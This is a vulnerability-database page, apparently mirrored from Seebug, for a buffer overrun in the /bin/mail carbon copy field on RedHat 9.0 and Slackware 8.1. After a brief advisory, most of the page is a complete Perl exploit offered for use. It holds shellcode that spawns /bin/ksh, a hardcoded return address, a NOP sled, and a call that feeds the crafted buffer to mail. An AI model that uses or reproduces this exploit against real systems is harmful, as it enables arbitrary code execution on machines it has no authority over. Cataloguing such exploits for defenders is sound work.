Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RedHat 9.0,Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 27 Views

/bin/mail Buffer Overrun Vulnerability in RedHat 9.0, Slackware 8.

Code

                                                source: http://www.securityfocus.com/bid/7760/info

A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun.

An attacker could exploit this issue to execute arbitrary commands. It should be noted that local exploitation may be inconsequential, however a malicious e-mail message or CGI interface could be a sufficient conduit for remote exploitation.

#!/usr/bin/perl
#
#
# Released under the GPL by a bored Vulndev member
# email: [email protected]
#
# The User 'cannot have expectations of privacy'. 
#
# For the Script to work you will need to:
# Run it, press 'return' once, then '.' then 'return'
#result = Shell (if you have /bin/ksh!)
#
# Anything you do with this script is your own problem,
# dont forget if you print it off, recycle!
# if you dont print it off, do so anyway 
# and use if for expensive toilet paper.
# 
# Systems Tested on: (Please let me know the outcome of your own box)
# Redhat 9.0 -- Vulnerable
# Redhat 9.0 with St Jude and St Michael -- Not Vulnerable
# Slackware 8.1 -- Vulnerable
# Slackware 9.0 -- Not Vulnerable
# Debian 3.0 (Testing) -- May be vulnerable.. needing comfirmation.
$shellcode = 
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x01".
"";
$ret = 0xbffff714;
$buf = 8232;
$egg = 9000;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) 
{ 
$offset = $ARGV[0];
}
$addr = pack('l',($ret + $offset));
for ($i = 0; $i < $buf; $i += 4)
{
$buffer .= $addr;
}
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) 
{
 $buffer .= $nop;
}
$buffer .= $shellcode;
exec("mail",'-s','Test','-c',$buffer,'root@localhost');
sendkeys("{CR}");
sendkeys(".");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
linuxbuffer overrunvulnerabilityemailremote exploitation/bin/mailredhat 9.0slackware 8.1
27